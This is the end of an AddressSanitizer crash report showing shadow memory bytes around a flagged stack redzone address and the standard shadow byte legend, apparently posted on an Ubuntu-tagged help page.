  0x10004ec87d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x10004ec87d60: 00 00 00 00 f1 f1 f1\[f1\]00 00 00 00 00 00 00 00
  0x10004ec87d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004ec87db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==38065\==ABORTING

Tag

#ubuntu